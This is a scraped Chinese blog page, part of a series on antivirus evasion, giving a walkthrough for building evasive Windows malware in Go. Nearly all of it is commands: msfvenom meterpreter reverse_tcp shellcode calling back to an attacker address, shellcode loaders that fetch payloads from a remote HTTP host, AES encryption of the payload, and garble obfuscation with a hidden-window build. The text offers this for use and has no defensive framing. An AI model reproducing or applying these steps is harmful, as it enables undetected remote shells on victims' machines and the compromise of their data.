当前位置: 首页 > news >正文

WEB渗透免杀篇-Golang免杀

  往期文章

 WEB渗透免杀篇-免杀工具全集-CSDN博客 

  WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-MSF免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

WEB渗透免杀篇-Golang免杀-CSDN博客

WEB渗透免杀篇-Pezor免杀-CSDN博客

WEB渗透免杀篇-cshot远程shellcode-CSDN博客

 

直接编译
生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
代码转换成0x格式,粘贴到go.txt中保存为go格式

image

安装golang环境在shellcode目录执行
>go build生成exe
编码编译
https://github.com/biggerduck/RedTeamNotes/blob/main/%E5%88%A9%E7%94%A8go%E5%8A%A0%E8%BD%BDshellcode%E5%85%8D%E6%9D%80.pdf
加载器
go-shellcode
https://github.com/brimstone/go-shellcode
进入cmd/sc目录编译sc.exe
>go build

image

生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt 
加载器加载shellcode
>sc.exe shellcode

image

Gsl

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip

>gsl -s SHELLCODE -hex msf生成hex格式
>gsl -f shell.raw本地加载raw格式文件
>gsl -f shell.hex -hex 本地加载hex格式文件
>gsl -u http://192.168.0.108/1.raw 远程加载
>gsl -u http://192.168.0.108/1.hex
go-shellcode-loader

https://github.com/HZzz2/go-shellcode-loader

>git clone https://github.com/HZzz2/go-shellcode-loader.git
>cd go-shellcode-loader
//下条命令安装第三方混淆库  GitHub地址:https://github.com/burrowers/garble
>go install mvdan.cc/garble@latest   
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
>base64 -w 0 -i rev.raw > rev.bs64
>cat rev.bs64

复制到aes-sc.go中的51行替换payload 运行aes-sc.go生成AES加密后的值

>go run aes-sc.go

复制输出的值到go-sc.go中的73行替换payload 编译成exe可执行程序

>garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go

参数解释: garble(混淆库): -tiny 删除额外信息 -literals 混淆文字 -seed=random base64编码的随机种子 go: -w 去掉调试信息,不能gdb调试了 -s 去掉符号表 -H windowsgui 隐藏执行窗口,不占用 cmd 终端。 (被查杀率高) -race 使数据允许竞争检测 编译后得到go-sc.exe


http://www.mrgr.cn/news/2840.html

相关文章:

  • JavaScript判断数组是否包含某个值
  • 五大无线领夹麦克风误区科普:领夹麦杂音干扰不耐用问题必须规避
  • Mac文件需要分卷压缩怎么办 Mac上怎么解压分卷压缩的文件
  • 打卡学习Python爬虫第二天|Requests的使用
  • 测绘程序设计|C#基本数据类型|值类型与引用类型
  • Tomcat学习进阶
  • Redis清空缓存
  • Spring 中,获取当前方法的类的代理对象有哪些方法?
  • 计算机Java项目|基于SpringBoot的农商对接系统的设计与实现
  • 斯坦福UE4 C++课学习补充22:AI行为树-寻路入门
  • windows入侵排查下
  • 华为Mate航天员系列影片引发热潮,Mate 70系列消息引爆网友期待
  • 告别U盘:看医院如何挑选高效安全的文件摆渡系统
  • 案例 | 生产制造中的直线度测量
  • 白骑士的HTML教学高级篇 3.2 高级表单元素
  • 部署同步工具syncthing
  • 微服务可用性设计
  • MBR10100FCT-ASEMI无人机专用MBR10100FCT
  • 通过Golang实现中间人攻击,查看和修改https流量包
  • Java:封装树结构